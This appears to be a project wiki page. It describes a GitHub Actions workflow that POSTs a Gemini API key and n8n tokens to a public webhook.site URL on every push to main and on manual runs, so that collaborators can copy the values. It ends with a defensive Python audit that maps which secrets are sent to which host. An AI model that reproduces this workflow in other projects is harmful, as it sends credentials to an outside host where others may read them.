Secrets environment variables using GitHub Actions workflow webhook
We store secrets such as the n8n API key, the n8n JWT and the Gemini API key as GitHub environment secrets.
Collaborators on this repository need to retrieve those values to develop locally against localhost.
To achieve this, a GitHub Actions workflow POSTs the secrets to a temporary webhook URL where a collaborator can read them and then delete the request from the history (the URL itself expires after 7 days as a fallback that limits how long the secrets stay exposed).
Created a Production environment following this help article.
Created secret keys following this help article on https://github.com/nicmart-dev/feedmenow/settings/secrets/actions
Authenticated users must have collaborator access to a repository to create, update, or read secrets.
We needed a way to share secrets between our team of collaborators. The problem is that:
Secrets are designed so that you save them in your own secret-keeping facility and, in addition, make them readable to GitHub Actions. GitHub Secrets are not designed to be a read/write secret vault: actions get read access and the admin gets write access, nothing more.
Following this solution, we decided to implement a workflow that POSTs the secrets to a webhook.
Note that webhook.site keeps a request history, so the user should delete the request immediately after reading it so others cannot see it, even though the webhook URL is deleted after 7 days anyway as a fallback. That also means a new URL may need to be saved to the GitHub Actions workflow before running it. Such a URL can be generated at https://webhook.site/
```yaml
name: Get GitHub Actions Secrets keys
on:
  # Note: the job also fires on every push to main, not only on the manual Run workflow button
  push:
    branches: [main]
  workflow_dispatch:
jobs:
  debug:
    runs-on: ubuntu-latest
    # Environment secrets are only exposed to jobs that declare the environment
    environment: Production
    steps:
      - name: Send GitHub Actions Secrets to webhook
        uses: fjogeleit/http-request-action@v1
        with:
          url: "https://webhook.site/[your_unique_id]"
          method: "POST"
          customHeaders: '{ "Content-Type": "application/json" }'
          # Secrets are interpolated into the request body at run time
          data: |
            {
              "GEMINI_API_KEY": "${{ secrets.GEMINI_API_KEY }}",
              "N8N_JWT": "${{ secrets.N8N_JWT }}",
              "N8N_API_KEY": "${{ secrets.N8N_API_KEY }}"
            }
```

For additional security, it is recommended to upgrade webhook.site, which then allows custom actions such as Don't save, so requests are not saved in the history but only displayed in the open browser tab.
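Before running or changing a workflow like this, it helps to have an inventory of which secrets it sends to which host and on which events (here, every push to main as well as the manual Run workflow button). The following stdlib-only Python audit is an added example, not part of this repository: it takes the workflow above as constructed sample input and relies on simple line-based parsing of two-space-indented YAML rather than a YAML library.

```python
import re
from urllib.parse import urlparse

# Constructed sample input: the workflow from this page (two-space indentation assumed).
WORKFLOW = """\
name: Get GitHub Actions Secrets keys
on:
  push:
    branches: [main]
  workflow_dispatch:
jobs:
  debug:
    environment: Production
    steps:
      - name: Send GitHub Actions Secrets to webhook
        uses: fjogeleit/http-request-action@v1
        with:
          url: "https://webhook.site/[your_unique_id]"
          data: |
            {
              "GEMINI_API_KEY": "${{ secrets.GEMINI_API_KEY }}",
              "N8N_JWT": "${{ secrets.N8N_JWT }}",
              "N8N_API_KEY": "${{ secrets.N8N_API_KEY }}"
            }
"""

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.(\w+)\s*\}\}")   # ${{ secrets.NAME }}
URL_RE = re.compile(r'\burl:\s*"?(\S+?)"?\s*$', re.MULTILINE)  # url: "https://..."

def triggers(text):
    """Event names under the top-level `on:` key (push, workflow_dispatch, ...)."""
    events, in_on = [], False
    for line in text.splitlines():
        if line and not line[0].isspace():           # a new top-level key
            in_on = line.rstrip() == "on:"
        elif in_on and re.match(r"  (\w+):", line):  # exactly one indent level deep
            events.append(line.strip().rstrip(":"))
    return events

def secret_egress(text):
    """Map each outbound host to the secrets referenced in the same step."""
    report = {}
    for step in re.split(r"\n\s*- name:", text)[1:]:  # one chunk per step
        url = URL_RE.search(step)
        if url:
            host = urlparse(url.group(1)).hostname
            report[host] = sorted(set(SECRET_REF.findall(step)))
    return report

def fires_without_manual_run(text):
    # Any trigger other than the Run workflow button (workflow_dispatch) posts the secrets unattended.
    return any(e != "workflow_dispatch" for e in triggers(text))
```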
- Go to the workflow and click the Run workflow button.
- Navigate to the webhook.site URL found in the file `.github/workflows/getApiKeys.yml` on the repo.
- Open the POST request in the Search query section.
- After adding those secrets to the `server\.env` file, make sure to click the red X icon to remove the request from the history.
Note: if the workflow fails or the request does not appear in webhook.site, the URL has most likely expired, so update the workflow with a new URL.
During development, we installed this extension, which makes running workflows faster: https://marketplace.visualstudio.com/items?itemName=GitHub.vscode-github-actions